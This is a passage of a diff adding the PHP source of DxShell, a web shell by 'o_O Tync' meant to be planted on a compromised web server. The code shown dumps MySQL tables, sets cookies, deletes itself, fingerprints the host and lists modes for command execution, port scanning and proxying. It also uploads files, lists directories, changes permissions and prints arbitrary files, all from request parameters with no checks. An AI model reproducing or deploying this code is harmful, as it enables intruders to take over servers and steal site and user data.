(!empty($_POST['dxsql_q'])) + { $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + foreach ($_POST['dxsql_q'] as $CUR) + if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */ + } + + foreach ($_POST['dxsql_tables'] as $CUR_TABLE) + { $DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */'; + DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true); + $DxDOWNLOAD_File['content'].="\n".$DUMP[0][1]; + $DxDOWNLOAD_File['content'].="\n\n"; + DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true); + for ($i=0; $i<count($DUMP); $i++) + { + for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]); + $DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");'; + } + } + } + +if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam'])) + { foreach ($_POST['dxparam'] as $name => $val) + { if ($name=='DXS_NEWCOOK') + { + if (empty($val['NAM']) or empty($val['VAL'])) continue; DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10); + } + else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10)); + } + DxGotoURL(DxURL('leave', 'dxmode')); + die(); + } + +if (isset($_GET['dxinstant'])) + { $_GET['dxinstant']=strtoupper($_GET['dxinstant']); + if ($_GET['dxinstant']=='DEL') + { + $ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + print '<script>window.alert("SELF '.( ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful' ).'");</script>'; + } + } + +function DxObGZ($s) {return gzencode($s);} + +if (isset($DxDOWNLOAD_File)) + {/* File downloader for everything */ + if (!$DXGLOBALSHIT) + { + if ($GLOB['SYS']['GZIP']['CanOutput']) + { + ini_set('output_buffering',4096); + ob_start("DxObGZ"); + header('Content-Encoding: gzip'); + } for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]); + print $DxDOWNLOAD_File['content']; + die(); + } + /* if u want to download file when $DXGLOBALSHIT, scroll down */ + } + +################################################################################### +####################++++++++++++++# M A I N #++++++++++++++++++#################### +################################################################################### +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array')); + +######## +######## Main HAT (blackhat? =))) ) +######## +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']'); + +if ($DXGLOBALSHIT) + print str_repeat("\n", 20).'<!--SHELL HERE-->'; +?> +<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title> +<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251"> +<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS"> +<http://leet.phpnet.us/sh.gif> +<style> +img {border-width:0pt;} +body, td {font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;} +h1 {font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;} +h2 {font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;} +h3 {font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;} +caption {font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;} +td.h2_oneline {font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;} +td.mode_header {font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;} +table.outset, td.outset {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;} +table.bord, td.bord, fieldset {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;} +hr {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;} +textarea.bout {border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;} +td.listing {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;} +td.linelisting {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;} +table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;} +td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +td.js_floatwin_body {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +font.rwx_sticky_bit {color:#FF0000;} +.highlight_txt {color: #FFFF00;} +.achtung {color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;} + +input {font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;} +input.radio {border-width:0pt;color: #FFFF00;} +input.submit {font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;} +input.bt_Yes {font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_No {font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_Yes:Hover {color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;} +input.bt_No:Hover {color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;} +textarea {color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt; + Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500; + Scrollbar-Highlight-Color: #00A000; Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000; + Scrollbar-Darkshadow-Color: #005000;} +select {background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;} + +A:Link, A:Visited { color: #00D000; text-decoration: underline; } +A.no:Link, A.no:Visited { color: #00D000; text-decoration: none; } +A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; } +.Hover:Hover {color: #FFFF00; cursor:help;} +.HoverClick:Hover {color: #FFFF00; cursor:crosshair;} +span.margin {margin: 0pt 10pt;} +td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;} +td.warning {color:#000000; background-color: #D00000; font-size: 11pt;} +font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;} +</style> + +<?php +if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT'))) + { /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?> +<SCRIPT> +var dom = document.getElementById?1:0; +var ie4 = document.all && document.all.item; +var opera = window.opera; //Opera +var ie5 = dom && ie4 && !opera; +var nn4 = document.layers; +var nn6 = dom && !ie5 && !opera; +var vers=parseInt(navigator.appVersion); +var good_browser = (ie5 || ie4); +function showwin(hdr,txt,w,vis) +{ +if(good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + var temp = + "<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">" + +((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"") + +"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>" + +"</TABLE>"; + + if (vis == 1) + { + obj.innerHTML = temp; + obj.style.width = w; + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + + obj.style.visibility = "visible"; + } + else + { + obj.style.visibility = "hidden"; + obj.style.posTop = 0; + obj.style.posLeft = 0; + } + } +} +function movewin() +{ +if (good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + } +} +</SCRIPT> +<?php } /* /END */?> + +</head> +<body> +<?php +if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */ + { print str_repeat("\n", 10).'<!--SHIT KILLER-->'; + print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2); + print "\n".'<TABLE WIDTH=100% BORDER=0 style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>'; + print "\n\n\n\n"; + } +?> + +<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td> + <td> +<?php +print "\n".'<div style="margin-right:'.( ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30' ).'pt;">'; +print "\n".( ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':'' ); +print "\n".DxPrint_ParamState('php_ver', phpversion() ).' ; '; +print "\n".DxPrint_ParamState('php_Safe_Mode', $GLOB['PHP']['SafeMode'], '!' ).' ; '; +print "\n".DxPrint_ParamState('magic_quotes', (bool)get_magic_quotes_gpc(), '!' ).' ; '; +print "\n".DxPrint_ParamState('gZip', function_exists('gzencode') ).' ; '; +print "\n".DxPrint_ParamState('cURL', function_exists('curl_version') ).' ; '; +print "\n".DxPrint_ParamState('MySQL', function_exists('mysql_connect') ).' ; '; +print "\n".DxPrint_ParamState('MsSQL', function_exists('mssql_connect') ).' ; '; +print "\n".DxPrint_ParamState('PostgreSQL', function_exists('pg_connect') ).' ; '; +print "\n".DxPrint_ParamState('Oracle', function_exists('ocilogon') ).' ; '; +print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>'); +print "\n".'</div>'; + +print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>'; +if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2) + print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>'; +print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>'; +print "\n".'</nobr></td></tr></table></span>'; + +print "\n\n".'<hr>'; +print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; '; +print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; '; +print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; '; +print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>'; +print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; '; +print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE']; +?> + </td> +</table> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><h2>Modes</td> + <td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a> + </td> + </tr> +</table> + +<?php $DX_Header_drawn=true; ?> + +<?php +################################################# +######## +######## DXGLOBALSHIT DOWNLOADER +######## +if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */ + { print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>'; + print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =(('; + print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download'; + + if ($GLOB['SYS']['GZIP']['CanUse']) $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6); + + print "\n\n".'<br><br>'; + print "\n".'<textarea rows=30 style="width:90%" align=center>'; + print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)'; + print "\n".'// The file is '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':'' ).' base64_encode()ed'; + print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';'; + print "\n\n\n\n"; + print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');'; + print "\n".'fputs($f, '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)' ).');'; + print "\n".'fclose($f);'; + print "\n".'//Yahoo, hacker, the file is here =)'; + print "\n".'?>'; + print "\n".'</textarea>'; + die(); + } + +?> + +<table align=center> + <tr><td class=mode_header> + @MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?> + </td></tr></table> +<? + +######## +######## AboutBox +######## +if ($_GET['dxmode']=='WTF') + { + ?> +<table align=center class=nooooneblya><tr><td><div align=center> +<?php +print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>'; +print '<br>o_O Tync, ICQ# 244-648'; +?><br><br> +<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table> +<SCRIPT language=Javascript><!-- +var tl=new Array( +"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?", +"What's wrong with other shells?", +"Usability, functionality, bugs?... NO.", +"The main bug is: these shells ARE NOT mine =)", +"Just like to be responsible for every motherfucking byte of code.", +"Enjoy!", +"-----------------------------------", +"o_O Tync, http://hellknights.void.ru/, ICQ#244648", +"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>", +"", +"Greetz to: ", +"iNfantry the Ruler", +"Nik8 the Hekker", +"_1nf3ct0r_ the Father", +"Industry of Death the betatest0r =)", +"", +"Thanks to:", +"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music", +"", +"Wartime testers & debuggers ::: =))) :::", +"MINDGROW", +"", +"", +"Hekk da pl0net!", +"--- EOF ---" +); +var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row; +function type_text() +{contents='';row=Math.max(0,index-50); +while(row<index) contents += tl[row++] + '\r\n'; +document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|'; +if(text_pos++==str_length) + {text_pos=0;index++; + if(index!=tl.length) + {str_length=tl[index].length;setTimeout("type_text()",1000); + } + } else setTimeout("type_text()",speed); +}type_text(); +//--> +</SCRIPT> + <?php + } + + + ################################### + +######## +######## Upload file +######## +if ($_GET['dxmode']=='UPL') + { + if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted')); + + if (isset($_FILES['dx_uplfile']['tmp_name'])) + { + $GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']); + DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE); + } + else + { + print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>'; + print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">'; + print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>'; + print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>'; + print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>'; + print "\n".'<input type=submit value="Upload" class="submit"></form>'; + } + } + + ################################### + +######## +######## Directory listings +######## +if ($_GET['dxmode']=='DIR') + { + if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']); + $_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']); + if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/'; + + print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>'; + print "\n".'<input type=submit value="Goto" class="submit"></form>'; + + print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>'; + if (!file_exists($_GET['dxdir'])) die(DxError('No such directory')); + if (!is_dir($_GET['dxdir'])) die(DxError('It\'s a file!! What do you think about listing files in a file? =)) ')); + + if (isset($_GET['dxparam'])) + { if ($_GET['dxparam']=='mkDIR') if ( !mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkDir. Perms?'); + if ($_GET['dxparam']=='mkFILE') if ( !touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkFile. Perms?'); + } + + if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...')); + $FILES=array('DIRS' => array(), 'FILES' => array()); + while (!is_bool( $file = readdir($dir_ptr) ) ) + if (($file!='.') and ($file!='..')) if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file; + asort($FILES['DIRS']);asort($FILES['FILES']); + + print "\n".'<span style="position:absolute;right:0pt;">'; + if (isset($_GET['dxdirsimple'])) print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>'; + else print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>'; + print '</span>'; + + $folderup_link=explode('/',$_GET['dxdir'].'../'); + if (!empty($folderup_link[ count($folderup_link)-3 ]) AND ($folderup_link[ count($folderup_link)-3 ]!='..')) + unset($folderup_link[ count($folderup_link)-3 ], $folderup_link[ count($folderup_link)-1 ]); + $folderup_link=implode('/', $folderup_link); + print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>' + .DxImg('foldup').' ../</a>'; + + print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>' + .' / '.str_repeat('&nbsp;',5) + .'<font class=highlight_txt>UPLOAD: </font>' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>' + ; + + print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files '; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">'; + for ($NOWi=0;$NOWi<=1;$NOWi++) + for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++) + { $cur=&$FILES[$NOW][$i]; + $dircur=$_GET['dxdir'].$cur; + print "\n".'<tr>'; + print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>' + .(($NOW=='DIRS')?DxImg('folder').' ' + . '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'') + .(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'') + .htmlspecialchars($cur).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + print "\n\t".'<td class=linelisting>' + .'<span '.DxDesign_DrawBubbleBox('File Info', '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>' + .'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>' + .'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur)) + , 150).' class=Hover><b>INFO</span> </td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>' + .((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'') + .'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>'; + } + + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>'; + if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>'; + print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>'; + } + print "\n\t".'</tr>'; + } + print "\n".'</table>'; + } + + +######## +######## File Global Actions +######## +if ('F_'==substr($_GET['dxmode'],0,2)) + { if (empty($_GET['dxfile'])) + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', ''); + print "\n".'<input type=text name="dxfile" value="" style="width:70%;">'; + print "\n".'<br><input type=submit value="Select" class="submit">'; + print "\n".'</form>'; + } + if (!file_exists(@$_GET['dxfile'])) die(DxError('No such file')); + print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + +######## +######## File CHMOD +######## +if ($_GET['dxmode']=='F_CHM') + { + if (isset($_GET['dxparam'])) + { if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE) + print DxError('Chmod "'.$_GET['dxfile'].'" failed'); + else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>'; + } + else + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )'; + print "\n".'<br><input type=text name="dxparam" value="'. + //decoct(fileperms($_GET['dxfile'])) + substr(sprintf('%o', fileperms($_GET['dxfile'])), -4) + .'">'; + print "\n".'<input type=submit value="chmod" class="submit"></form>'; + } + } + +######## +######## File View +######## +if ($_GET['dxmode']=='F_VIEW') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>'; + print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>'; + print "\n".'<td>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>' + .'</td>'; + print "\n".'</tr></table><br>'; + print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file'; + + print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n"; + print "\n".'<plaintext>'; + print file_get_contents($_GET['dxfile']); + die(); /* Plaintext is infinite */ + } + +######## 